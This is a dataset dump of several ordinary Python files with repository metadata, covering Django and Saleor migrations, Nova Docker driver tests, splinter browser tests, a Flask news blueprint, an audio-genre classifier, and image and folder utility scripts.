pred_y_df[0:20] | 24.555556 | 101 | 0.791855 | 44 | 221 | 3.636364 | 0.5 | 0.15625 | 0.075 | 0.125 | 0.2125 | 0.2125 | 0.2125 | 0 | 0 | 0 | 0 | 0.024272 | 0.067873 | 221 | 9 | 102 | 24.555556 | 0.752427 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d5c05a70d2bfb21530d973639155b0914281d250 | 1,882 | py | Python | greenbounty/bounties/migrations/0001_initial.py | Carnales/green-bounty | beb765082b32c096139463bf75ccc1ec3d530692 | [
"MIT"
] | 1 | 2021-01-18T21:43:05.000Z | 2021-01-18T21:43:05.000Z | greenbounty/bounties/migrations/0001_initial.py | Thinkr3/green-bounty | c74fe79121d211728c9f70ffd87e239c8ba5d131 | [
"MIT"
] | 1 | 2021-01-18T06:35:07.000Z | 2021-01-18T06:35:07.000Z | greenbounty/bounties/migrations/0001_initial.py | Thinkr3/green-bounty | c74fe79121d211728c9f70ffd87e239c8ba5d131 | [
"MIT"
] | 2 | 2021-01-18T06:22:50.000Z | 2021-01-18T06:24:22.000Z | # Generated by Django 3.1.4 on 2021-01-17 19:12
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Organization',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=25, null=True)),
('balance', models.FloatField()),
('total', models.FloatField()),
],
),
migrations.CreateModel(
name='Hunter',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50, null=True)),
('image', models.ImageField(blank=True, null=True, upload_to='')),
('user', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Bounty',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=25, null=True)),
('image', models.ImageField(blank=True, null=True, upload_to='')),
('price', models.FloatField()),
('city', models.CharField(max_length=25, null=True)),
('hunter', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='bounties.hunter')),
],
),
]
| 40.042553 | 144 | 0.584485 | 196 | 1,882 | 5.494898 | 0.346939 | 0.059424 | 0.066852 | 0.089136 | 0.528319 | 0.528319 | 0.528319 | 0.49675 | 0.49675 | 0.49675 | 0 | 0.016801 | 0.272582 | 1,882 | 46 | 145 | 40.913043 | 0.769905 | 0.023911 | 0 | 0.487179 | 1 | 0 | 0.056676 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.076923 | 0 | 0.179487 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d5c06f16c3fcc96993938e0c35fe7c62d8dfa422 | 8,621 | py | Python | nova/tests/virt/docker/test_driver.py | osrg/nova | 14b6bc655145c832bd9c822e48f877818e0e53ff | [
"Apache-2.0"
] | null | null | null | nova/tests/virt/docker/test_driver.py | osrg/nova | 14b6bc655145c832bd9c822e48f877818e0e53ff | [
"Apache-2.0"
] | null | null | null | nova/tests/virt/docker/test_driver.py | osrg/nova | 14b6bc655145c832bd9c822e48f877818e0e53ff | [
"Apache-2.0"
] | null | null | null | # vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright (c) 2013 dotCloud, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import socket
import mock
from nova import context
from nova import exception
from nova.openstack.common import jsonutils
from nova.openstack.common import units
from nova import test
from nova.tests import utils
import nova.tests.virt.docker.mock_client
from nova.tests.virt.test_virt_drivers import _VirtDriverTestCase
from nova.virt.docker import hostinfo
from nova.virt.docker import network
class DockerDriverTestCase(_VirtDriverTestCase, test.TestCase):
driver_module = 'nova.virt.docker.DockerDriver'
def setUp(self):
super(DockerDriverTestCase, self).setUp()
self.stubs.Set(nova.virt.docker.driver.DockerDriver,
'docker',
nova.tests.virt.docker.mock_client.MockClient())
def fake_setup_network(self, instance, network_info):
return
self.stubs.Set(nova.virt.docker.driver.DockerDriver,
'_setup_network',
fake_setup_network)
def fake_get_registry_port(self):
return 5042
self.stubs.Set(nova.virt.docker.driver.DockerDriver,
'_get_registry_port',
fake_get_registry_port)
# Note: using mock.object.path on class throws
# errors in test_virt_drivers
def fake_teardown_network(container_id):
return
self.stubs.Set(network, 'teardown_network', fake_teardown_network)
self.context = context.RequestContext('fake_user', 'fake_project')
def test_driver_capabilities(self):
self.assertFalse(self.connection.capabilities['has_imagecache'])
self.assertFalse(self.connection.capabilities['supports_recreate'])
#NOTE(bcwaldon): This exists only because _get_running_instance on the
# base class will not let us set a custom disk/container_format.
def _get_running_instance(self, obj=False):
instance_ref = utils.get_test_instance(obj=obj)
network_info = utils.get_test_network_info()
network_info[0]['network']['subnets'][0]['meta']['dhcp_server'] = \
'1.1.1.1'
image_info = utils.get_test_image_info(None, instance_ref)
image_info['disk_format'] = 'raw'
image_info['container_format'] = 'docker'
self.connection.spawn(self.ctxt, jsonutils.to_primitive(instance_ref),
image_info, [], 'herp', network_info=network_info)
return instance_ref, network_info
def test_get_host_stats(self):
self.mox.StubOutWithMock(socket, 'gethostname')
socket.gethostname().AndReturn('foo')
socket.gethostname().AndReturn('bar')
self.mox.ReplayAll()
self.assertEqual('foo',
self.connection.get_host_stats()['host_hostname'])
self.assertEqual('foo',
self.connection.get_host_stats()['host_hostname'])
def test_get_available_resource(self):
memory = {
'total': 4 * units.Mi,
'free': 3 * units.Mi,
'used': 1 * units.Mi
}
disk = {
'total': 50 * units.Gi,
'available': 25 * units.Gi,
'used': 25 * units.Gi
}
# create the mocks
with contextlib.nested(
mock.patch.object(hostinfo, 'get_memory_usage',
return_value=memory),
mock.patch.object(hostinfo, 'get_disk_usage',
return_value=disk)
) as (
get_memory_usage,
get_disk_usage
):
# run the code
stats = self.connection.get_available_resource(nodename='test')
# make our assertions
get_memory_usage.assert_called_once_with()
get_disk_usage.assert_called_once_with()
expected_stats = {
'vcpus': 1,
'vcpus_used': 0,
'memory_mb': 4,
'memory_mb_used': 1,
'local_gb': 50L,
'local_gb_used': 25L,
'disk_available_least': 25L,
'hypervisor_type': 'docker',
'hypervisor_version': 1000,
'hypervisor_hostname': 'test',
'cpu_info': '?',
'supported_instances': ('[["i686", "docker", "lxc"],'
' ["x86_64", "docker", "lxc"]]')
}
self.assertEqual(expected_stats, stats)
def test_plug_vifs(self):
# Check to make sure the method raises NotImplementedError.
self.assertRaises(NotImplementedError,
self.connection.plug_vifs,
instance=utils.get_test_instance(),
network_info=None)
def test_unplug_vifs(self):
# Check to make sure the method raises NotImplementedError.
self.assertRaises(NotImplementedError,
self.connection.unplug_vifs,
instance=utils.get_test_instance(),
network_info=None)
def test_create_container(self, image_info=None):
instance_href = utils.get_test_instance()
if image_info is None:
image_info = utils.get_test_image_info(None, instance_href)
image_info['disk_format'] = 'raw'
image_info['container_format'] = 'docker'
self.connection.spawn(self.context, instance_href, image_info,
'fake_files', 'fake_password')
self._assert_cpu_shares(instance_href)
def test_create_container_vcpus_2(self, image_info=None):
flavor = utils.get_test_flavor(options={
'name': 'vcpu_2',
'flavorid': 'vcpu_2',
'vcpus': 2
})
instance_href = utils.get_test_instance(flavor=flavor)
if image_info is None:
image_info = utils.get_test_image_info(None, instance_href)
image_info['disk_format'] = 'raw'
image_info['container_format'] = 'docker'
self.connection.spawn(self.context, instance_href, image_info,
'fake_files', 'fake_password')
self._assert_cpu_shares(instance_href, vcpus=2)
def _assert_cpu_shares(self, instance_href, vcpus=4):
container_id = self.connection.find_container_by_name(
instance_href['name']).get('id')
container_info = self.connection.docker.inspect_container(container_id)
self.assertEqual(vcpus * 1024, container_info['Config']['CpuShares'])
def test_create_container_wrong_image(self):
instance_href = utils.get_test_instance()
image_info = utils.get_test_image_info(None, instance_href)
image_info['disk_format'] = 'raw'
image_info['container_format'] = 'invalid_format'
self.assertRaises(exception.InstanceDeployFailure,
self.test_create_container,
image_info)
@mock.patch.object(network, 'teardown_network')
@mock.patch.object(nova.virt.docker.driver.DockerDriver,
'find_container_by_name', return_value={'id': 'fake_id'})
def test_destroy_container(self, byname_mock, teardown_mock):
instance = utils.get_test_instance()
self.connection.destroy(self.context, instance, 'fake_networkinfo')
byname_mock.assert_called_once_with(instance['name'])
teardown_mock.assert_called_with('fake_id')
def test_get_memory_limit_from_sys_meta_in_object(self):
instance = utils.get_test_instance(obj=True)
limit = self.connection._get_memory_limit_bytes(instance)
self.assertEqual(2048 * units.Mi, limit)
def test_get_memory_limit_from_sys_meta_in_db_instance(self):
instance = utils.get_test_instance(obj=False)
limit = self.connection._get_memory_limit_bytes(instance)
self.assertEqual(2048 * units.Mi, limit)
| 40.85782 | 79 | 0.629741 | 984 | 8,621 | 5.243902 | 0.256098 | 0.04186 | 0.034884 | 0.034884 | 0.395543 | 0.320736 | 0.290891 | 0.277326 | 0.251744 | 0.230426 | 0 | 0.011036 | 0.274794 | 8,621 | 210 | 80 | 41.052381 | 0.814299 | 0.117968 | 0 | 0.234177 | 0 | 0 | 0.110319 | 0.00673 | 0 | 0 | 0 | 0 | 0.113924 | 0 | null | null | 0.012658 | 0.082278 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d5c40e739be914cd8694a4a6735e497e975d7778 | 1,791 | py | Python | tests/test_webdriver_chrome.py | kidosoft/splinter | 6d5052fd73c0a626299574cea76924e367c67faa | [
"BSD-3-Clause"
] | 1 | 2016-09-21T19:32:47.000Z | 2016-09-21T19:32:47.000Z | tests/test_webdriver_chrome.py | kidosoft/splinter | 6d5052fd73c0a626299574cea76924e367c67faa | [
"BSD-3-Clause"
] | null | null | null | tests/test_webdriver_chrome.py | kidosoft/splinter | 6d5052fd73c0a626299574cea76924e367c67faa | [
"BSD-3-Clause"
] | 1 | 2019-12-02T15:19:07.000Z | 2019-12-02T15:19:07.000Z | # -*- coding: utf-8 -*-
# Copyright 2013 splinter authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
import os
import unittest
from splinter import Browser
from .fake_webapp import EXAMPLE_APP
from .base import WebDriverTests
from selenium.common.exceptions import WebDriverException
def chrome_installed():
try:
Browser("chrome")
except WebDriverException:
return False
return True
class ChromeBrowserTest(WebDriverTests, unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.browser = Browser("chrome")
@classmethod
def tearDownClass(cls):
cls.browser.quit()
def setUp(self):
self.browser.visit(EXAMPLE_APP)
def test_attach_file(self):
"should provide a way to change file field value"
file_path = os.path.join(
os.path.abspath(os.path.dirname(__file__)),
'mockfile.txt'
)
self.browser.attach_file('file', file_path)
self.browser.find_by_name('upload').click()
html = self.browser.html
self.assertIn('text/plain', html)
self.assertIn(open(file_path).read().encode('utf-8'), html)
def test_should_support_with_statement(self):
with Browser('chrome') as internet:
pass
class ChromeBrowserFullscreenTest(WebDriverTests, unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.browser = Browser("chrome", fullscreen=True)
@classmethod
def tearDownClass(cls):
cls.browser.quit()
def setUp(self):
self.browser.visit(EXAMPLE_APP)
def test_should_support_with_statement(self):
with Browser('chrome', fullscreen=True) as internet:
pass
| 25.225352 | 69 | 0.672808 | 213 | 1,791 | 5.539906 | 0.455399 | 0.055085 | 0.044068 | 0.069492 | 0.372034 | 0.372034 | 0.372034 | 0.372034 | 0.372034 | 0.372034 | 0 | 0.004357 | 0.231156 | 1,791 | 70 | 70 | 25.585714 | 0.852578 | 0.123953 | 0 | 0.382979 | 0 | 0 | 0.070676 | 0 | 0 | 0 | 0 | 0 | 0.042553 | 1 | 0.212766 | false | 0.042553 | 0.12766 | 0 | 0.425532 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d5c61844c85a34a814f44efd7ddfec47f1e2a5e5 | 1,131 | py | Python | flaskbb/plugins/news/views.py | konstantin1985/forum | 7d4de24ccc932e9764699d89c8cc9d210b7fac7f | [
"BSD-3-Clause"
] | null | null | null | flaskbb/plugins/news/views.py | konstantin1985/forum | 7d4de24ccc932e9764699d89c8cc9d210b7fac7f | [
"BSD-3-Clause"
] | null | null | null | flaskbb/plugins/news/views.py | konstantin1985/forum | 7d4de24ccc932e9764699d89c8cc9d210b7fac7f | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from flask import Blueprint, redirect
from flaskbb.utils.helpers import render_template
from .forms import AddForm, DeleteForm
from .models import MyPost
from flaskbb.extensions import db
news = Blueprint("news", __name__, template_folder="templates")
def inject_news_link():
return render_template("navigation_snippet.html")
@news.route("/")
def index():
return render_template("index.html", newsposts = MyPost.query.all())
@news.route('/add', methods=['GET', 'POST'])
def add():
form = AddForm()
if form.validate_on_submit():
p = MyPost(name = form.name.data, text = form.text.data)
db.session.add(p)
db.session.commit()
return redirect('/news')
return render_template('add.html', form=form)
@news.route('/delete', methods=['GET', 'POST'])
def delete():
form = DeleteForm()
if form.validate_on_submit():
p = MyPost.query.filter(MyPost.name == form.name.data).first()
db.session.delete(p)
db.session.commit()
return redirect('/news')
return render_template('delete.html', form=form)
| 26.928571 | 72 | 0.660477 | 143 | 1,131 | 5.104895 | 0.370629 | 0.09589 | 0.109589 | 0.046575 | 0.279452 | 0.227397 | 0.227397 | 0.147945 | 0.147945 | 0.147945 | 0 | 0.001091 | 0.189213 | 1,131 | 41 | 73 | 27.585366 | 0.794984 | 0.018568 | 0 | 0.206897 | 0 | 0 | 0.09132 | 0.020796 | 0 | 0 | 0 | 0 | 0 | 1 | 0.137931 | false | 0 | 0.172414 | 0.068966 | 0.517241 | 0.068966 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
d5d04044860f90c923e15fee006637515d70252d | 6,215 | py | Python | src/main.py | mafshar/sub-puppo | 20fe5bf3ca3d250d846c545085f748e706c4a33e | [
"MIT"
] | 1 | 2018-03-02T04:24:33.000Z | 2018-03-02T04:24:33.000Z | src/main.py | mafshar/sub-puppo | 20fe5bf3ca3d250d846c545085f748e706c4a33e | [
"MIT"
] | null | null | null | src/main.py | mafshar/sub-puppo | 20fe5bf3ca3d250d846c545085f748e706c4a33e | [
"MIT"
] | null | null | null | #!/usr/bin/env python
'''
Notes:
- Weak implies weakly supervised learning (4 classes)
- Strong implies strongly (fully) superversied learning (10 classes)
- frame number is set to 22ms (default); that is the "sweet spot" based on dsp literature
- sampling rate is 16kHz (for the MFCC of each track)
- Accuracy increases as the test set gets smaller, which implies that a lot of these machine learning models are heavily data-driven (i.e. feed more data for more performance boosts)
- Currently, optimal benchmark results are achieved with a test set size of 10 percent of the total data
'''
import os
import glob
import sys
import time
import warnings
warnings.filterwarnings("ignore")
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from processing import mfcc_processing, datasets
from deep_models import models
from sklearn.model_selection import train_test_split
from sklearn.svm import SVC
from sklearn.neighbors import KNeighborsClassifier
from sklearn.cluster import KMeans
from sklearn.preprocessing import MinMaxScaler
from sklearn.preprocessing import normalize
input_path = './data/genres/'
mfcc_path = './data/processed/mfcc/'
have_mfccs = True
def normalize_and_split(data, test_size, verbose=False):
scaler = MinMaxScaler()
features = scaler.fit_transform(data['features'])
labels = data['labels']
X_train, X_test, y_train, y_test = train_test_split(features, labels, test_size=test_size, random_state=42)
norm_data = {}
norm_data['X_train'] = X_train
norm_data['X_test'] = X_test
norm_data['y_train'] = y_train
norm_data['y_test'] = y_test
if verbose:
print 'Training sample feature size:', X_train.shape
print 'Training sample label size:', y_train.shape
print 'Test sample feature size:', X_test.shape
print 'Test sample label size:', y_test.shape
return norm_data
def svm_classifier(data, test_size, weak=False, verbose=False):
norm_data = normalize_and_split(data, test_size, verbose)
X_train = norm_data['X_train']
X_test = norm_data['X_test']
y_train = norm_data['y_train']
y_test = norm_data['y_test']
tic = time.time()
svm_clf = SVC(C=10000, kernel='poly', degree=3, tol=0.0001, max_iter=5000, decision_function_shape='ovr') if weak \
else SVC(C=10000, kernel='poly', degree=6, tol=0.01, max_iter=5000, decision_function_shape='ovr')
svm_clf.fit(X_train, y_train)
print 'TEST ACCURACY:', svm_clf.score(X_test, y_test)
toc = time.time()
if verbose:
print '\ttime taken for SVM classifier to run is', toc-tic
return
def knn_classifier(data, test_size, weak=False, verbose=False):
norm_data = normalize_and_split(data, test_size, verbose)
X_train = norm_data['X_train']
X_test = norm_data['X_test']
y_train = norm_data['y_train']
y_test = norm_data['y_test']
tic = time.time()
knn_clf = KNeighborsClassifier(n_neighbors=3, weights='distance', p=1, n_jobs=-1) if weak \
else KNeighborsClassifier(n_neighbors=8, weights='distance', p=1, n_jobs=-1)
knn_clf.fit(X_train, y_train)
print 'TEST ACCURACY:', knn_clf.score(X_test, y_test)
toc = time.time()
if verbose:
print '\ttime taken for KNN classifier to run is', toc-tic
return
def mfcc_nn_model(num_epochs, test_size, weak=False, verbose=False):
tic = time.time()
tensorize = datasets.ToTensor()
dataset = None
net = None
if weak:
dataset = datasets.MfccDatasetWeak(mfcc_path, tensorize)
net = models.MfccNetWeak()
else:
dataset = datasets.MfccDataset(mfcc_path, tensorize)
net = models.MfccNet()
trainloader, testloader = datasets.train_test_dataset_split(dataset)
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(net.parameters(), lr=0.1, momentum=0.8)
for epoch in range(num_epochs):
running_loss = 0.0
for i, data in enumerate(trainloader, 0):
inputs, labels = data
# zero the parameter gradients
optimizer.zero_grad()
# forward + backward + optimize
outputs = net(inputs)
loss = criterion(outputs, labels)
loss.backward
optimizer.step()
# print statistics
running_loss += loss.item()
if verbose and i % 5 == 0: # print every 2000 mini-batches
print('[%d, %5d] loss: %.3f' % (epoch + 1, i + 1, running_loss / 2000))
running_loss = 0.0
correct = 0
total = 0
with torch.no_grad():
for data in testloader:
inputs, labels = data
outputs = net(inputs)
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += (predicted == labels).sum().item()
print 'TEST ACCURACY:', 1. * correct / total
toc = time.time()
if verbose:
print '\ttime taken for Mfcc NN to run is', toc-tic
return
if __name__ == '__main__':
mfccs = None
data = None
if not have_mfccs:
have_mfccs = True
print 'calculating mfccs...'
mfccs = mfcc_processing.write_mfccs(input_path, mfcc_path, True)
else :
print 'retrieving mfccs...'
mfccs = mfcc_processing.read_mfccs(mfcc_path, True)
data = mfcc_processing.featurize_data(mfccs, weak=True, verbose=True)
print
weak = False
if weak:
data = mfcc_processing.featurize_data(mfccs, weak=True, verbose=True)
print
svm_classifier(data, test_size=0.10, weak=True, verbose=True)
print
knn_classifier(data, test_size=0.10, weak=True, verbose=True)
print
mfcc_nn_model(num_epochs=10, test_size=0.10, weak=True, verbose=True)
else:
data = mfcc_processing.featurize_data(mfccs, weak=False, verbose=True)
print
svm_classifier(data, test_size=0.10, weak=False, verbose=True)
print
knn_classifier(data, test_size=0.10, weak=False, verbose=True)
print
mfcc_nn_model(num_epochs=10, test_size=0.10, weak=False, verbose=True)
| 32.710526 | 187 | 0.665809 | 863 | 6,215 | 4.615295 | 0.261877 | 0.032137 | 0.027115 | 0.033141 | 0.380115 | 0.344715 | 0.32011 | 0.271906 | 0.248054 | 0.220939 | 0 | 0.019966 | 0.234433 | 6,215 | 189 | 188 | 32.883598 | 0.81715 | 0.020274 | 0 | 0.326087 | 0 | 0 | 0.090346 | 0.004007 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.130435 | null | null | 0.144928 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d5d313602da6567472c45152b7f1fb43db070947 | 901 | py | Python | datedfolder.py | IgorRidanovic/flapi | 7eb35cc670a5d1a06b01fb13982ffa63345369de | [
"MIT"
] | 3 | 2020-09-21T13:07:05.000Z | 2021-01-29T19:44:02.000Z | datedfolder.py | IgorRidanovic/flapi | 7eb35cc670a5d1a06b01fb13982ffa63345369de | [
"MIT"
] | null | null | null | datedfolder.py | IgorRidanovic/flapi | 7eb35cc670a5d1a06b01fb13982ffa63345369de | [
"MIT"
] | null | null | null | #! /usr/bin/env python
# -*- coding: utf-8 -*-
'''
Create a Baselight folder with current date and time stamp.
You must refresh the Job Manager after running the script.
Copyright (c) 2020 Igor Riđanović, Igor [at] hdhead.com, www.metafide.com
'''
import flapi
from getflapi import getflapi
from datetime import datetime
def make_dated_folder(ip, scene, foldername):
conn, msg = getflapi()
jobman = conn.JobManager
stamp = datetime.now().strftime('_%d-%b-%Y_%H.%M.%S')
try:
jobman.create_folder(ip, scene, foldername + stamp)
except flapi.FLAPIException:
print 'Could not create a folder.'
return False
# Cleanup
conn.close()
if __name__=='__main__':
conn, msg = getflapi()
print msg + '\n'
ip = 'localhost'
currentScene = 'Test01'
folderName = 'MyFolder'
make_dated_folder(ip, currentScene, folderName)
| 23.710526 | 73 | 0.662597 | 115 | 901 | 5.06087 | 0.669565 | 0.041237 | 0.051546 | 0.058419 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01 | 0.223085 | 901 | 37 | 74 | 24.351351 | 0.821429 | 0.056604 | 0 | 0.1 | 0 | 0 | 0.119011 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.15 | null | null | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d5d9540eff941a339f643e59edbea5708ee6a194 | 2,354 | py | Python | scripts/generate_image_series.py | JIC-Image-Analysis/senescence-in-field | f310e34df377eb807423c38cf27d1ade0782f5a2 | [
"MIT"
] | null | null | null | scripts/generate_image_series.py | JIC-Image-Analysis/senescence-in-field | f310e34df377eb807423c38cf27d1ade0782f5a2 | [
"MIT"
] | null | null | null | scripts/generate_image_series.py | JIC-Image-Analysis/senescence-in-field | f310e34df377eb807423c38cf27d1ade0782f5a2 | [
"MIT"
] | null | null | null | # Draw image time series for one or more plots
from jicbioimage.core.image import Image
import dtoolcore
import click
from translate_labels import rack_plot_to_image_plot
from image_utils import join_horizontally, join_vertically
def identifiers_where_match_is_true(dataset, match_function):
return [i for i in dataset.identifiers if match_function(i)]
def generate_image_series_for_plot(rack, plot):
n_image, n_plot = rack_plot_to_image_plot(rack, plot)
# n_image, n_plot = 55, 24
print "{}_{}".format(n_image, n_plot)
dataset_uri = 'file:/Users/hartleym/data_intermediate/separate_plots'
dataset = dtoolcore.DataSet.from_uri(dataset_uri)
plot_number_overlay = dataset.get_overlay('plot_number')
ordering_overlay = dataset.get_overlay('ordering')
date_overlay = dataset.get_overlay('date')
def is_match(i):
try:
ordering_as_int = int(ordering_overlay[i])
except TypeError:
return False
if ordering_as_int != n_image:
return False
if int(plot_number_overlay[i]) != n_plot:
return False
return True
identifiers = identifiers_where_match_is_true(dataset, is_match)
def sort_identifiers_by_date(identifiers):
dates_and_identifiers = [(date_overlay[i], i) for i in identifiers]
sorted_dates_and_identifiers = sorted(dates_and_identifiers)
_, sorted_identifiers = zip(*sorted_dates_and_identifiers)
return(sorted_identifiers)
sorted_identifiers = sort_identifiers_by_date(identifiers)
def identifiers_to_joined_image(identifiers):
images = []
for identifier in identifiers:
image_fpath = dataset.item_content_abspath(identifier)
image = Image.from_file(image_fpath)
images.append(image)
return join_horizontally(images)
result = identifiers_to_joined_image(sorted_identifiers)
output_fname = 'example_from_tobin.png'
with open(output_fname, 'wb') as fh:
fh.write(result.png())
@click.command()
def main():
# Early leaf senescence
# generate_image_series_for_plot(3, 16)
# generate_image_series_for_plot(7, 9)
# generate_image_series_for_plot(9, 1)
# Late leaf senescence
generate_image_series_for_plot(7, 15)
if __name__ == '__main__':
main()
| 26.75 | 75 | 0.712404 | 307 | 2,354 | 5.074919 | 0.319218 | 0.03466 | 0.060976 | 0.070603 | 0.279204 | 0.185494 | 0.080873 | 0 | 0 | 0 | 0 | 0.007519 | 0.209006 | 2,354 | 87 | 76 | 27.057471 | 0.829216 | 0.095157 | 0 | 0.0625 | 0 | 0 | 0.053252 | 0.035344 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.104167 | null | null | 0.020833 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d5da19776d7a24ff632b755eb644da772dbdd1cc | 6,063 | py | Python | saleor/order/migrations/0015_auto_20170206_0407.py | acabezasg/urpi-master | 7c9cd0fbe6d89dad70652482712ca38b21ba6f84 | [
"BSD-3-Clause"
] | 6 | 2019-01-06T08:39:20.000Z | 2022-03-04T18:07:47.000Z | saleor/order/migrations/0015_auto_20170206_0407.py | valentine217/saleor | 323963748e6a2702265ec6635b930a234abde4f5 | [
"BSD-3-Clause"
] | 5 | 2021-03-09T16:22:37.000Z | 2022-02-10T19:10:03.000Z | saleor/order/migrations/0015_auto_20170206_0407.py | valentine217/saleor | 323963748e6a2702265ec6635b930a234abde4f5 | [
"BSD-3-Clause"
] | 1 | 2020-12-26T10:25:37.000Z | 2020-12-26T10:25:37.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-02-06 10:07
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django_prices.models
class Migration(migrations.Migration):
dependencies = [
('order', '0014_auto_20161028_0955'),
]
operations = [
migrations.AlterModelOptions(
name='deliverygroup',
options={'verbose_name': 'Delivery Group', 'verbose_name_plural': 'Delivery Groups'},
),
migrations.AlterModelOptions(
name='order',
options={'ordering': ('-last_status_change',), 'verbose_name': 'Order', 'verbose_name_plural': 'Orders'},
),
migrations.AlterModelOptions(
name='ordereditem',
options={'verbose_name': 'Ordered item', 'verbose_name_plural': 'Ordered items'},
),
migrations.AlterModelOptions(
name='orderhistoryentry',
options={'ordering': ('date',), 'verbose_name': 'Order history entry', 'verbose_name_plural': 'Order history entries'},
),
migrations.AlterModelOptions(
name='ordernote',
options={'verbose_name': 'Order note', 'verbose_name_plural': 'Order notes'},
),
migrations.AlterModelOptions(
name='payment',
options={'ordering': ('-pk',), 'verbose_name': 'Payment', 'verbose_name_plural': 'Payments'},
),
migrations.AlterField(
model_name='deliverygroup',
name='last_updated',
field=models.DateTimeField(auto_now=True, null=True, verbose_name='last updated'),
),
migrations.AlterField(
model_name='deliverygroup',
name='shipping_method_name',
field=models.CharField(blank=True, default=None, editable=False, max_length=255, null=True, verbose_name='shipping method name'),
),
migrations.AlterField(
model_name='deliverygroup',
name='tracking_number',
field=models.CharField(blank=True, default='', max_length=255, verbose_name='tracking number'),
),
migrations.AlterField(
model_name='order',
name='billing_address',
field=models.ForeignKey(editable=False, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='account.Address', verbose_name='billing address'),
),
migrations.AlterField(
model_name='order',
name='discount_amount',
field=django_prices.models.MoneyField(blank=True, currency=settings.DEFAULT_CURRENCY, decimal_places=2, max_digits=12, null=True, verbose_name='discount amount'),
),
migrations.AlterField(
model_name='order',
name='discount_name',
field=models.CharField(blank=True, default='', max_length=255, verbose_name='discount name'),
),
migrations.AlterField(
model_name='order',
name='shipping_address',
